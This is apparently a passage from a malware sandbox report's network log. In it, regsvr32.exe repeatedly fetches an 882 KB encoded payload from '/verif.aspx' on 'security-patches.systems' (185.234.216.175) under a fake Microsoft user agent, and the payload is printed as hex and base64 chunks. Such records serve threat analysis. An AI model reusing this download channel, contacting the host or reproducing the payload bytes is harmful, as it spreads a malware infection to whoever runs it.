6b 64 47 36 68 6a 65 76 47 6e Data Ascii: aOumQZ6qtb79dsyunr5DvDX6sLhg3Aev+x+rURdLx6Joncyu6MD6yYedPOckTRq89dLNrp69dSZ5YtiC6thayIeduMR1qrXI8e97r56qw6I0nMyu6tACyYeduNwtq7XI8Sc/2CxFjXKgYjNRYbyxN3hivsRBq7XI8Ten2iTBw7JAncyu6hjetAF2PCdtks8Lh53MUGFVStxypbZtnqq1N3hiM9v0abXIh+pmuW7jD9/9okdG6hjevGn
2024-12-06 21:11:16 UTC	16384	IN	Data Raw: 67 55 74 64 35 43 76 6a 4a 6d 39 42 53 64 56 55 6f 33 65 4f 6c 6d 57 65 67 41 68 72 77 39 7a 72 6f 55 73 64 34 48 35 2f 45 76 39 39 6f 30 6d 63 4e 69 6b 4f 6c 32 75 65 67 51 67 72 77 31 0d 0a 71 72 6f 63 30 64 67 66 78 53 72 70 64 72 6b 78 33 67 66 7a 6b 49 35 4f 72 70 34 2f 53 72 6f 31 79 6d 4b 35 6b 4e 32 31 79 50 75 6d 4f 31 37 58 68 63 2f 6c 44 58 56 62 52 31 31 56 53 6c 2b 49 0d 0a 46 44 74 42 43 65 33 47 50 32 69 4b 38 32 64 6e 56 63 6e 7a 64 4b 56 32 6b 57 46 56 53 6a 66 31 4c 35 2f 59 4c 4c 48 42 59 70 7a 70 4d 64 67 6b 36 63 46 36 6e 4f 6c 6d 6b 65 68 45 77 58 4c 45 0d 0a 36 33 62 70 36 68 6a 79 76 6a 58 57 39 42 53 64 71 72 58 49 68 2b 39 2b 2b 59 6d 64 6b 7a 64 34 36 58 62 6c 36 68 69 2b 55 2f 46 76 4d 31 46 68 56 63 48 53 4a 61 48 2f 6e 61 32 Data Ascii: gUtd5CvjJm9BSdVUo3eOlmWegAhrw9zroUsd4H5/Ev99o0mcNikOl2uegQgrw1qroc0dgfxSrpdrkx3gfzkI5Orp4/Sro1ymK5kN21yPumO17Xhc/lDXVbR11VSl+IFDtBCe3GP2iK82dnVcnzdKV2kWFVSjf1L5/YLLHBYpzpMdgk6cF6nOlmkehEwXLE63bp6hjyvjXW9BSdqrXIh+9++Ymdkzd46Xbl6hi+U/FvM1FhVcHSJaH/na2
2024-12-06 21:11:16 UTC	16384	IN	Data Raw: 58 49 68 2b 48 66 51 65 71 5a 77 35 4b 34 6e 4d 79 75 36 73 41 36 79 49 65 64 59 62 6b 34 4a 30 6f 33 38 79 66 44 32 6d 6d 39 4e 59 56 34 0d 0a 59 76 55 55 69 46 54 42 65 6f 6a 70 49 74 6a 30 50 62 58 49 68 2b 39 32 75 4f 6a 51 4a 73 69 48 6e 62 67 63 61 64 37 66 57 34 65 64 7a 4e 74 6a 33 55 75 36 39 51 72 4d 72 70 37 63 78 31 4f 48 0d 0a 6e 63 7a 61 4e 46 33 42 73 68 79 64 7a 4b 37 71 58 63 4e 39 66 4b 56 32 72 5a 36 71 74 63 6a 31 4c 2f 2b 35 73 42 4e 49 4e 33 66 55 5a 70 30 7a 32 41 66 6a 6b 43 61 34 55 32 48 65 44 7a 2b 52 0d 0a 69 44 64 52 59 64 34 50 78 2f 75 69 4e 39 6a 6b 4e 62 58 49 68 39 73 33 55 57 46 56 49 65 61 48 36 62 59 78 6e 71 71 31 4e 43 68 6d 75 73 51 39 71 72 58 49 38 2b 39 76 72 70 36 71 79 51 35 34 0d 0a 46 31 47 58 4a 4c 31 4b 38 Data Ascii: XIh+HfQeqZw5K4nMyu6sA6yIedYbk4J0o38yfD2mm9NYV4YvUUiFTBeojpItj0PbXIh+92uOjQJsiHnbgcad7fW4edzNtj3Uu69QrMrp7cx1OHnczaNF3BshydzK7qXcN9fKV2rZ6qtcj1L/+5sBNIN3fUZp0z2AfjkCa4U2HeDz+RiDdRYd4Px/uiN9jkNbXIh9s3UWFVIeaH6bYxnqq1NChmusQ9qrXI8+9vrp6qyQ54F1GXJL1K8
2024-12-06 21:11:16 UTC	16384	IN	Data Raw: 67 63 69 64 61 4c 50 35 42 75 58 56 46 68 33 67 66 66 6b 4d 59 72 55 32 48 65 42 38 76 7a 0d 0a 61 39 75 72 34 6c 56 4b 76 43 32 65 75 46 4f 49 4d 55 67 33 65 4f 6c 32 72 65 4b 56 54 72 34 39 70 6f 70 56 59 56 56 4b 58 4b 6d 64 75 42 53 6c 56 68 6f 7a 38 54 66 7a 32 69 79 56 77 53 62 78 0d 0a 4e 34 2f 61 4a 4f 6e 4b 44 33 6f 58 4f 70 59 6b 6a 55 73 33 65 47 4c 59 56 71 59 51 6b 6a 64 34 59 6a 50 62 4c 49 33 43 65 6f 70 74 68 51 53 54 30 4a 68 43 4a 2b 6c 32 72 65 4b 56 54 72 34 39 0d 0a 32 6f 70 56 59 56 56 4b 58 4b 6d 64 75 42 54 5a 56 68 6f 7a 38 54 65 48 32 69 7a 68 77 53 62 78 4e 34 50 61 4a 4f 58 4b 44 33 6b 58 4f 70 59 6b 67 55 73 33 65 47 4c 59 56 71 59 51 6e 6a 64 34 0d 0a 59 6a 50 62 4c 49 48 43 65 6f 6c 74 68 51 53 51 30 4a 68 43 62 77 6f 79 51 Data Ascii: gcidaLP5BuXVFh3gffkMYrU2HeB8vza9ur4lVKvC2euFOIMUg3eOl2reKVTr49popVYVVKXKmduBSlVhoz8Tfz2iyVwSbxN4/aJOnKD3oXOpYkjUs3eGLYVqYQkjd4YjPbLI3CeopthQST0JhCJ+l2reKVTr492opVYVVKXKmduBTZVhoz8TeH2izhwSbxN4PaJOXKD3kXOpYkgUs3eGLYVqYQnjd4YjPbLIHCeolthQSQ0JhCbwoyQ
2024-12-06 21:11:16 UTC	16384	IN	Data Raw: 2f 77 50 66 71 33 31 57 6c 46 77 58 4c 67 0d 0a 34 66 4e 51 36 4e 41 6d 79 59 65 64 75 42 7a 35 33 31 75 2f 4c 64 2b 77 46 50 6c 55 79 6b 72 46 59 6b 61 2f 36 68 44 53 48 50 30 4f 7a 61 36 65 33 4d 39 66 68 70 33 4d 32 75 77 39 74 4d 69 48 0d 0a 36 37 34 31 6e 36 71 31 76 4f 30 47 7a 61 36 65 33 4e 39 58 68 70 33 4d 32 75 51 31 74 4d 69 48 4d 6c 76 56 35 56 31 61 75 76 56 4b 7a 36 36 65 76 57 30 38 68 35 33 31 46 4a 31 44 78 37 70 51 0d 0a 6e 73 79 75 4d 44 39 61 75 75 33 69 79 61 36 65 42 38 46 36 69 49 72 34 64 57 4a 56 77 37 49 6b 6e 4d 79 75 36 74 41 57 79 59 65 64 75 74 51 35 71 37 58 49 76 69 66 50 52 75 6f 59 75 72 53 35 0d 0a 49 72 68 41 36 4d 41 65 79 6f 65 64 75 42 42 6c 33 4d 39 76 68 5a 33 4d 32 69 68 64 77 37 6f 6b 6e 38 79 75 37 4d 41 65 79 Data Ascii: /wPfq31WlFwXLg4fNQ6NAmyYeduBz531u/Ld+wFPlUykrFYka/6hDSHP0Oza6e3M9fhp3M2uw9tMiH6741n6q1vO0Gza6e3N9Xhp3M2uQ1tMiHMlvV5V1auvVKz66evW08h531FJ1Dx7pQnsyuMD9auu3iya6eB8F6iIr4dWJVw7IknMyu6tAWyYedutQ5q7XIvifPRuoYurS5IrhA6MAeyoeduBBl3M9vhZ3M2ihdw7okn8yu7MAey
2024-12-06 21:11:16 UTC	16384	IN	Data Raw: 62 57 53 52 6b 31 70 62 64 53 43 4b 67 43 64 69 56 63 46 36 68 4f 70 79 4d 65 6f 51 74 72 79 64 50 2f 46 56 59 5a 6d 47 2b 37 51 33 75 4c 33 69 75 57 61 2b 4e 5a 36 34 46 47 6e 63 44 38 50 7a 0d 0a 4c 38 66 59 4c 49 48 42 59 6f 54 72 5a 71 48 71 45 4c 71 2b 50 5a 71 34 48 4a 6d 53 53 7a 64 34 59 6a 50 61 4e 4b 32 4e 64 58 78 69 4d 31 46 68 33 67 38 2f 38 32 71 36 48 49 33 65 48 39 76 78 0d 0a 4e 39 76 63 4a 4c 33 44 63 71 54 70 66 6c 6e 71 52 4d 45 31 38 53 66 58 32 69 79 78 77 33 71 59 37 32 61 78 36 41 43 53 76 44 32 2b 75 46 6b 77 33 68 2f 76 38 32 42 6a 32 69 79 70 6f 68 6d 62 0d 0a 6e 4d 7a 61 4a 4b 6e 42 30 69 57 67 4e 31 47 74 6d 59 62 37 74 44 65 34 76 65 4b 35 58 72 34 31 6e 72 67 55 6e 64 77 50 77 2f 4d 76 78 39 67 73 72 63 46 69 67 4b 55 78 55 Data Ascii: bWSRk1pbdSCKgCdiVcF6hOpyMeoQtrydP/FVYZmG+7Q3uL3iuWa+NZ64FGncD8PzL8fYLIHBYoTrZqHqELq+PZq4HJmSSzd4YjPaNK2NdXxiM1Fh3g8/82q6HI3eH9vxN9vcJL3DcqTpflnqRME18SfX2iyxw3qY72ax6ACSvD2+uFkw3h/v82Bj2iypohmbnMzaJKnB0iWgN1GtmYb7tDe4veK5Xr41nrgUndwPw/Mvx9gsrcFigKUxU
2024-12-06 21:11:16 UTC	16384	IN	Data Raw: 58 49 31 79 76 47 4d 7a 55 57 47 2b 54 66 41 39 70 6a 4e 52 59 56 58 41 63 72 79 4c 47 46 42 68 56 61 4d 54 65 57 49 7a 30 52 79 6d 54 45 49 35 0d 0a 34 6b 36 6a 5a 69 42 78 76 44 56 71 75 42 42 70 33 68 73 37 38 36 72 62 6d 77 5a 52 53 72 77 31 62 6c 56 65 54 78 52 43 71 49 36 6d 64 79 74 6f 6b 67 2f 33 65 57 49 7a 55 59 70 53 6a 58 4b 34 0d 0a 59 6a 4e 52 59 64 38 50 39 35 47 47 4d 31 46 68 76 4a 63 33 65 47 4b 7a 4c 4a 4a 53 50 33 54 34 48 38 46 58 46 47 6a 42 59 6e 54 70 65 56 6e 71 42 30 62 66 2f 51 55 33 55 65 6f 51 51 73 56 33 0d 0a 63 6e 74 5a 42 31 70 6b 2f 2b 65 55 39 78 55 62 58 49 31 79 78 47 4d 7a 55 57 47 2b 54 66 41 39 33 6a 4e 52 59 56 58 41 63 73 53 4c 71 46 46 68 56 61 4f 6a 65 47 49 7a 30 52 79 6d 54 45 49 39 0d 0a 34 6b 36 6a 5a 43 42 Data Ascii: XI1yvGMzUWG+TfA9pjNRYVXAcryLGFBhVaMTeWIz0RymTEI54k6jZiBxvDVquBBp3hs786rbmwZRSrw1blVeTxRCqI6mdytokg/3eWIzUYpSjXK4YjNRYd8P95GGM1FhvJc3eGKzLJJSP3T4H8FXFGjBYnTpeVnqB0bf/QU3UeoQQsV3cntZB1pk/+eU9xUbXI1yxGMzUWG+TfA93jNRYVXAcsSLqFFhVaOjeGIz0RymTEI94k6jZCB

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.5	49795	185.234.216.175	443	5956	C:\Windows\SysWOW64\regsvr32.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-06 21:12:12 UTC	117	OUT	GET /verif.aspx HTTP/1.1 User-Agent: Microsoft-WNS/11.0 Host: security-patches.systems Cache-Control: no-cache
2024-12-06 21:12:13 UTC	252	IN	HTTP/1.1 200 OK Date: Fri, 06 Dec 2024 21:12:12 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 Last-Modified: Sat, 23 Nov 2024 15:29:11 GMT ETag: "d75c4-62796294faafa" Accept-Ranges: bytes Content-Length: 882116 Connection: close
2024-12-06 21:12:13 UTC	7940	IN	Data Raw: 4c 32 6e 42 59 56 5a 4b 4e 33 68 6d 4d 31 46 68 71 72 55 33 65 4e 6f 7a 55 57 46 56 53 6a 64 34 49 6a 4e 52 59 56 56 4b 4e 33 68 69 4d 31 46 68 56 55 6f 33 65 47 49 7a 55 57 46 56 53 6a 64 34 0d 0a 59 6a 4e 52 59 56 56 4b 4e 33 68 69 4d 31 46 68 58 55 73 33 65 47 77 73 36 32 39 56 2f 6a 36 31 51 34 74 51 4c 5a 68 72 59 78 41 4c 51 48 45 52 4a 79 56 51 43 67 4e 65 63 51 49 30 4a 46 6b 58 0d 0a 46 68 4d 7a 42 48 55 34 51 68 5a 43 57 6a 39 42 45 51 56 6b 57 41 39 63 4e 51 52 37 52 7a 70 79 52 6a 4e 52 59 56 56 4b 4e 33 68 48 2f 76 68 4f 4e 4f 62 77 42 41 4f 66 6c 68 30 30 35 76 41 45 0d 0a 30 4f 32 56 48 44 2f 6d 38 41 54 51 37 5a 4d 63 6c 65 62 77 42 41 55 65 6b 68 77 6b 35 76 41 45 42 52 36 56 48 43 48 6d 38 41 54 51 37 5a 49 63 49 75 62 77 42 41 55 65 6b Data Ascii: L2nBYVZKN3hmM1FhqrU3eNozUWFVSjd4IjNRYVVKN3hiM1FhVUo3eGIzUWFVSjd4YjNRYVVKN3hiM1FhXUs3eGws629V/j61Q4tQLZhrYxALQHERJyVQCgNecQI0JFkXFhMzBHU4QhZCWj9BEQVkWA9cNQR7RzpyRjNRYVVKN3hH/vhONObwBAOflh005vAE0O2VHD/m8ATQ7ZMclebwBAUekhwk5vAEBR6VHCHm8ATQ7ZIcIubwBAUek
2024-12-06 21:12:13 UTC	16384	IN	Data Raw: 2b 36 59 2f 32 69 79 70 6f 6c 46 35 59 54 50 61 4a 4b 6e 42 30 69 57 67 4e 31 47 74 6d 59 62 37 74 4b 37 2f 6e 61 32 5a 68 76 75 30 0d 0a 4e 37 69 39 34 72 6c 69 76 6a 57 65 41 4a 48 71 47 4c 61 2b 65 65 74 79 56 65 67 55 51 72 77 74 6e 76 51 54 5a 56 52 4b 4e 33 6a 70 64 71 32 6d 46 55 49 32 65 47 49 7a 32 69 79 70 6a 54 61 63 0d 0a 38 54 74 42 36 67 42 47 76 69 32 4b 75 42 52 70 33 41 2f 54 38 79 2f 50 30 71 42 5a 77 33 71 55 36 57 61 39 36 41 43 79 76 44 32 4b 75 68 53 42 33 67 66 54 38 53 2f 76 32 6a 53 31 77 54 58 78 0d 0a 4a 2b 76 61 4c 49 6e 42 4a 76 45 33 78 39 6f 6b 72 59 30 33 2f 42 51 37 51 65 6f 59 73 76 42 35 69 6b 56 5a 63 64 34 66 7a 2f 4d 6e 78 39 67 6a 55 63 6c 4b 6a 47 4a 47 57 4b 59 51 75 6a 64 34 0d 0a 59 6a 4f 36 61 4e 34 48 77 33 73 Data Ascii: +6Y/2iypolF5YTPaJKnB0iWgN1GtmYb7tK7/na2Zhvu0N7i94rlivjWeAJHqGLa+eetyVegUQrwtnvQTZVRKN3jpdq2mFUI2eGIz2iypjTac8TtB6gBGvi2KuBRp3A/T8y/P0qBZw3qU6Wa96ACyvD2KuhSB3gfT8S/v2jS1wTXxJ+vaLInBJvE3x9okrY03/BQ7QeoYsvB5ikVZcd4fz/Mnx9gjUclKjGJGWKYQujd4YjO6aN4Hw3s
2024-12-06 21:12:13 UTC	16384	IN	Data Raw: 36 51 43 30 4f 4d 34 6e 7a 64 53 68 49 52 48 77 50 62 6f 7a 55 57 46 56 77 58 70 6f 0d 0a 36 33 36 39 36 67 42 47 76 69 32 53 75 42 53 52 33 41 2f 37 38 79 2f 66 32 43 79 46 78 32 4b 30 36 32 61 78 70 68 43 65 4e 33 68 69 4d 39 6f 6b 64 63 4e 79 6e 4f 6c 2b 54 65 67 59 6f 72 77 74 0d 0a 69 72 6f 45 70 64 34 50 30 2f 45 6e 2b 39 77 73 6b 63 4e 36 70 4f 6c 6d 73 54 50 65 42 2b 75 51 52 67 35 51 59 62 78 64 79 49 65 64 75 42 52 70 33 67 63 72 38 7a 63 54 32 47 6e 63 47 6a 50 7a 0d 0a 4a 7a 76 61 68 41 69 4a 2b 37 53 75 2f 35 32 74 6d 59 62 37 74 44 65 34 76 54 79 57 68 76 75 30 72 76 2b 64 72 5a 6d 47 2b 37 51 33 75 4c 30 77 76 6b 4f 38 50 57 71 77 6b 58 48 63 44 7a 2f 7a 0d 0a 4c 7a 74 71 4c 46 6b 2b 41 50 4d 33 4f 39 67 30 71 63 46 36 68 49 6f 59 67 32 4e Data Ascii: 6QC0OM4nzdShIRHwPbozUWFVwXpo63696gBGvi2SuBSR3A/78y/f2CyFx2K062axphCeN3hiM9okdcNynOl+TegYorwtiroEpd4P0/En+9wskcN6pOlmsTPeB+uQRg5QYbxdyIeduBRp3gcr8zcT2GncGjPzJzvahAiJ+7Su/52tmYb7tDe4vTyWhvu0rv+drZmG+7Q3uL0wvkO8PWqwkXHcDz/zLztqLFk+APM3O9g0qcF6hIoYg2N
2024-12-06 21:12:13 UTC	16384	IN	Data Raw: 61 4f 75 6d 51 5a 36 71 74 62 37 39 0d 0a 64 73 79 75 6e 72 35 44 76 44 58 36 73 4c 68 67 33 41 65 76 2b 78 2b 72 55 52 64 4c 78 36 4a 6f 6e 63 79 75 36 4d 44 36 79 59 65 64 50 4f 63 6b 54 52 71 38 39 64 4c 4e 72 70 36 39 64 53 5a 35 0d 0a 59 74 69 43 36 74 68 61 79 49 65 64 75 4d 52 31 71 72 58 49 38 65 39 37 72 35 36 71 77 36 49 30 6e 4d 79 75 36 74 41 43 79 59 65 64 75 4e 77 74 71 37 58 49 38 53 63 2f 32 43 78 46 6a 58 4b 67 0d 0a 59 6a 4e 52 59 62 79 78 4e 33 68 69 76 73 52 42 71 37 58 49 38 54 65 6e 32 69 54 42 77 37 4a 41 6e 63 79 75 36 68 6a 65 74 41 46 32 50 43 64 74 6b 73 38 4c 68 35 33 4d 55 47 46 56 53 74 78 79 0d 0a 70 62 5a 74 6e 71 71 31 4e 33 68 69 4d 39 76 30 61 62 58 49 68 2b 70 6d 75 57 37 6a 44 39 2f 39 6f 6b 64 47 36 68 6a 65 76 47 6e Data Ascii: aOumQZ6qtb79dsyunr5DvDX6sLhg3Aev+x+rURdLx6Joncyu6MD6yYedPOckTRq89dLNrp69dSZ5YtiC6thayIeduMR1qrXI8e97r56qw6I0nMyu6tACyYeduNwtq7XI8Sc/2CxFjXKgYjNRYbyxN3hivsRBq7XI8Ten2iTBw7JAncyu6hjetAF2PCdtks8Lh53MUGFVStxypbZtnqq1N3hiM9v0abXIh+pmuW7jD9/9okdG6hjevGn
2024-12-06 21:12:13 UTC	16384	IN	Data Raw: 67 55 74 64 35 43 76 6a 4a 6d 39 42 53 64 56 55 6f 33 65 4f 6c 6d 57 65 67 41 68 72 77 39 7a 72 6f 55 73 64 34 48 35 2f 45 76 39 39 6f 30 6d 63 4e 69 6b 4f 6c 32 75 65 67 51 67 72 77 31 0d 0a 71 72 6f 63 30 64 67 66 78 53 72 70 64 72 6b 78 33 67 66 7a 6b 49 35 4f 72 70 34 2f 53 72 6f 31 79 6d 4b 35 6b 4e 32 31 79 50 75 6d 4f 31 37 58 68 63 2f 6c 44 58 56 62 52 31 31 56 53 6c 2b 49 0d 0a 46 44 74 42 43 65 33 47 50 32 69 4b 38 32 64 6e 56 63 6e 7a 64 4b 56 32 6b 57 46 56 53 6a 66 31 4c 35 2f 59 4c 4c 48 42 59 70 7a 70 4d 64 67 6b 36 63 46 36 6e 4f 6c 6d 6b 65 68 45 77 58 4c 45 0d 0a 36 33 62 70 36 68 6a 79 76 6a 58 57 39 42 53 64 71 72 58 49 68 2b 39 2b 2b 59 6d 64 6b 7a 64 34 36 58 62 6c 36 68 69 2b 55 2f 46 76 4d 31 46 68 56 63 48 53 4a 61 48 2f 6e 61 32 Data Ascii: gUtd5CvjJm9BSdVUo3eOlmWegAhrw9zroUsd4H5/Ev99o0mcNikOl2uegQgrw1qroc0dgfxSrpdrkx3gfzkI5Orp4/Sro1ymK5kN21yPumO17Xhc/lDXVbR11VSl+IFDtBCe3GP2iK82dnVcnzdKV2kWFVSjf1L5/YLLHBYpzpMdgk6cF6nOlmkehEwXLE63bp6hjyvjXW9BSdqrXIh+9++Ymdkzd46Xbl6hi+U/FvM1FhVcHSJaH/na2
2024-12-06 21:12:13 UTC	16384	IN	Data Raw: 58 49 68 2b 48 66 51 65 71 5a 77 35 4b 34 6e 4d 79 75 36 73 41 36 79 49 65 64 59 62 6b 34 4a 30 6f 33 38 79 66 44 32 6d 6d 39 4e 59 56 34 0d 0a 59 76 55 55 69 46 54 42 65 6f 6a 70 49 74 6a 30 50 62 58 49 68 2b 39 32 75 4f 6a 51 4a 73 69 48 6e 62 67 63 61 64 37 66 57 34 65 64 7a 4e 74 6a 33 55 75 36 39 51 72 4d 72 70 37 63 78 31 4f 48 0d 0a 6e 63 7a 61 4e 46 33 42 73 68 79 64 7a 4b 37 71 58 63 4e 39 66 4b 56 32 72 5a 36 71 74 63 6a 31 4c 2f 2b 35 73 42 4e 49 4e 33 66 55 5a 70 30 7a 32 41 66 6a 6b 43 61 34 55 32 48 65 44 7a 2b 52 0d 0a 69 44 64 52 59 64 34 50 78 2f 75 69 4e 39 6a 6b 4e 62 58 49 68 39 73 33 55 57 46 56 49 65 61 48 36 62 59 78 6e 71 71 31 4e 43 68 6d 75 73 51 39 71 72 58 49 38 2b 39 76 72 70 36 71 79 51 35 34 0d 0a 46 31 47 58 4a 4c 31 4b 38 Data Ascii: XIh+HfQeqZw5K4nMyu6sA6yIedYbk4J0o38yfD2mm9NYV4YvUUiFTBeojpItj0PbXIh+92uOjQJsiHnbgcad7fW4edzNtj3Uu69QrMrp7cx1OHnczaNF3BshydzK7qXcN9fKV2rZ6qtcj1L/+5sBNIN3fUZp0z2AfjkCa4U2HeDz+RiDdRYd4Px/uiN9jkNbXIh9s3UWFVIeaH6bYxnqq1NChmusQ9qrXI8+9vrp6qyQ54F1GXJL1K8
2024-12-06 21:12:13 UTC	16384	IN	Data Raw: 67 63 69 64 61 4c 50 35 42 75 58 56 46 68 33 67 66 66 6b 4d 59 72 55 32 48 65 42 38 76 7a 0d 0a 61 39 75 72 34 6c 56 4b 76 43 32 65 75 46 4f 49 4d 55 67 33 65 4f 6c 32 72 65 4b 56 54 72 34 39 70 6f 70 56 59 56 56 4b 58 4b 6d 64 75 42 53 6c 56 68 6f 7a 38 54 66 7a 32 69 79 56 77 53 62 78 0d 0a 4e 34 2f 61 4a 4f 6e 4b 44 33 6f 58 4f 70 59 6b 6a 55 73 33 65 47 4c 59 56 71 59 51 6b 6a 64 34 59 6a 50 62 4c 49 33 43 65 6f 70 74 68 51 53 54 30 4a 68 43 4a 2b 6c 32 72 65 4b 56 54 72 34 39 0d 0a 32 6f 70 56 59 56 56 4b 58 4b 6d 64 75 42 54 5a 56 68 6f 7a 38 54 65 48 32 69 7a 68 77 53 62 78 4e 34 50 61 4a 4f 58 4b 44 33 6b 58 4f 70 59 6b 67 55 73 33 65 47 4c 59 56 71 59 51 6e 6a 64 34 0d 0a 59 6a 50 62 4c 49 48 43 65 6f 6c 74 68 51 53 51 30 4a 68 43 62 77 6f 79 51 Data Ascii: gcidaLP5BuXVFh3gffkMYrU2HeB8vza9ur4lVKvC2euFOIMUg3eOl2reKVTr49popVYVVKXKmduBSlVhoz8Tfz2iyVwSbxN4/aJOnKD3oXOpYkjUs3eGLYVqYQkjd4YjPbLI3CeopthQST0JhCJ+l2reKVTr492opVYVVKXKmduBTZVhoz8TeH2izhwSbxN4PaJOXKD3kXOpYkgUs3eGLYVqYQnjd4YjPbLIHCeolthQSQ0JhCbwoyQ
2024-12-06 21:12:13 UTC	16384	IN	Data Raw: 2f 77 50 66 71 33 31 57 6c 46 77 58 4c 67 0d 0a 34 66 4e 51 36 4e 41 6d 79 59 65 64 75 42 7a 35 33 31 75 2f 4c 64 2b 77 46 50 6c 55 79 6b 72 46 59 6b 61 2f 36 68 44 53 48 50 30 4f 7a 61 36 65 33 4d 39 66 68 70 33 4d 32 75 77 39 74 4d 69 48 0d 0a 36 37 34 31 6e 36 71 31 76 4f 30 47 7a 61 36 65 33 4e 39 58 68 70 33 4d 32 75 51 31 74 4d 69 48 4d 6c 76 56 35 56 31 61 75 76 56 4b 7a 36 36 65 76 57 30 38 68 35 33 31 46 4a 31 44 78 37 70 51 0d 0a 6e 73 79 75 4d 44 39 61 75 75 33 69 79 61 36 65 42 38 46 36 69 49 72 34 64 57 4a 56 77 37 49 6b 6e 4d 79 75 36 74 41 57 79 59 65 64 75 74 51 35 71 37 58 49 76 69 66 50 52 75 6f 59 75 72 53 35 0d 0a 49 72 68 41 36 4d 41 65 79 6f 65 64 75 42 42 6c 33 4d 39 76 68 5a 33 4d 32 69 68 64 77 37 6f 6b 6e 38 79 75 37 4d 41 65 79 Data Ascii: /wPfq31WlFwXLg4fNQ6NAmyYeduBz531u/Ld+wFPlUykrFYka/6hDSHP0Oza6e3M9fhp3M2uw9tMiH6741n6q1vO0Gza6e3N9Xhp3M2uQ1tMiHMlvV5V1auvVKz66evW08h531FJ1Dx7pQnsyuMD9auu3iya6eB8F6iIr4dWJVw7IknMyu6tAWyYedutQ5q7XIvifPRuoYurS5IrhA6MAeyoeduBBl3M9vhZ3M2ihdw7okn8yu7MAey
2024-12-06 21:12:13 UTC	16384	IN	Data Raw: 62 57 53 52 6b 31 70 62 64 53 43 4b 67 43 64 69 56 63 46 36 68 4f 70 79 4d 65 6f 51 74 72 79 64 50 2f 46 56 59 5a 6d 47 2b 37 51 33 75 4c 33 69 75 57 61 2b 4e 5a 36 34 46 47 6e 63 44 38 50 7a 0d 0a 4c 38 66 59 4c 49 48 42 59 6f 54 72 5a 71 48 71 45 4c 71 2b 50 5a 71 34 48 4a 6d 53 53 7a 64 34 59 6a 50 61 4e 4b 32 4e 64 58 78 69 4d 31 46 68 33 67 38 2f 38 32 71 36 48 49 33 65 48 39 76 78 0d 0a 4e 39 76 63 4a 4c 33 44 63 71 54 70 66 6c 6e 71 52 4d 45 31 38 53 66 58 32 69 79 78 77 33 71 59 37 32 61 78 36 41 43 53 76 44 32 2b 75 46 6b 77 33 68 2f 76 38 32 42 6a 32 69 79 70 6f 68 6d 62 0d 0a 6e 4d 7a 61 4a 4b 6e 42 30 69 57 67 4e 31 47 74 6d 59 62 37 74 44 65 34 76 65 4b 35 58 72 34 31 6e 72 67 55 6e 64 77 50 77 2f 4d 76 78 39 67 73 72 63 46 69 67 4b 55 78 55 Data Ascii: bWSRk1pbdSCKgCdiVcF6hOpyMeoQtrydP/FVYZmG+7Q3uL3iuWa+NZ64FGncD8PzL8fYLIHBYoTrZqHqELq+PZq4HJmSSzd4YjPaNK2NdXxiM1Fh3g8/82q6HI3eH9vxN9vcJL3DcqTpflnqRME18SfX2iyxw3qY72ax6ACSvD2+uFkw3h/v82Bj2iypohmbnMzaJKnB0iWgN1GtmYb7tDe4veK5Xr41nrgUndwPw/Mvx9gsrcFigKUxU
2024-12-06 21:12:13 UTC	16384	IN	Data Raw: 58 49 31 79 76 47 4d 7a 55 57 47 2b 54 66 41 39 70 6a 4e 52 59 56 58 41 63 72 79 4c 47 46 42 68 56 61 4d 54 65 57 49 7a 30 52 79 6d 54 45 49 35 0d 0a 34 6b 36 6a 5a 69 42 78 76 44 56 71 75 42 42 70 33 68 73 37 38 36 72 62 6d 77 5a 52 53 72 77 31 62 6c 56 65 54 78 52 43 71 49 36 6d 64 79 74 6f 6b 67 2f 33 65 57 49 7a 55 59 70 53 6a 58 4b 34 0d 0a 59 6a 4e 52 59 64 38 50 39 35 47 47 4d 31 46 68 76 4a 63 33 65 47 4b 7a 4c 4a 4a 53 50 33 54 34 48 38 46 58 46 47 6a 42 59 6e 54 70 65 56 6e 71 42 30 62 66 2f 51 55 33 55 65 6f 51 51 73 56 33 0d 0a 63 6e 74 5a 42 31 70 6b 2f 2b 65 55 39 78 55 62 58 49 31 79 78 47 4d 7a 55 57 47 2b 54 66 41 39 33 6a 4e 52 59 56 58 41 63 73 53 4c 71 46 46 68 56 61 4f 6a 65 47 49 7a 30 52 79 6d 54 45 49 39 0d 0a 34 6b 36 6a 5a 43 42 Data Ascii: XI1yvGMzUWG+TfA9pjNRYVXAcryLGFBhVaMTeWIz0RymTEI54k6jZiBxvDVquBBp3hs786rbmwZRSrw1blVeTxRCqI6mdytokg/3eWIzUYpSjXK4YjNRYd8P95GGM1FhvJc3eGKzLJJSP3T4H8FXFGjBYnTpeVnqB0bf/QU3UeoQQsV3cntZB1pk/+eU9xUbXI1yxGMzUWG+TfA93jNRYVXAcsSLqFFhVaOjeGIz0RymTEI94k6jZCB

Session ID	Source IP	Source Port	Destination IP	Destination Port
5	192.168.2.5	49830	185.234.216.175	443

Timestamp	Bytes transferred	Direction	Data
2024-12-06 21:13:12 UTC	117	OUT	GET /verif.aspx HTTP/1.1 User-Agent: Microsoft-WNS/11.0 Host: security-patches.systems Cache-Control: no-cache
2024-12-06 21:13:13 UTC	252	IN	HTTP/1.1 200 OK Date: Fri, 06 Dec 2024 21:13:13 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 Last-Modified: Sat, 23 Nov 2024 15:29:11 GMT ETag: "d75c4-62796294faafa" Accept-Ranges: bytes Content-Length: 882116 Connection: close
2024-12-06 21:13:13 UTC	7940	IN	Data Raw: 4c 32 6e 42 59 56 5a 4b 4e 33 68 6d 4d 31 46 68 71 72 55 33 65 4e 6f 7a 55 57 46 56 53 6a 64 34 49 6a 4e 52 59 56 56 4b 4e 33 68 69 4d 31 46 68 56 55 6f 33 65 47 49 7a 55 57 46 56 53 6a 64 34 0d 0a 59 6a 4e 52 59 56 56 4b 4e 33 68 69 4d 31 46 68 58 55 73 33 65 47 77 73 36 32 39 56 2f 6a 36 31 51 34 74 51 4c 5a 68 72 59 78 41 4c 51 48 45 52 4a 79 56 51 43 67 4e 65 63 51 49 30 4a 46 6b 58 0d 0a 46 68 4d 7a 42 48 55 34 51 68 5a 43 57 6a 39 42 45 51 56 6b 57 41 39 63 4e 51 52 37 52 7a 70 79 52 6a 4e 52 59 56 56 4b 4e 33 68 48 2f 76 68 4f 4e 4f 62 77 42 41 4f 66 6c 68 30 30 35 76 41 45 0d 0a 30 4f 32 56 48 44 2f 6d 38 41 54 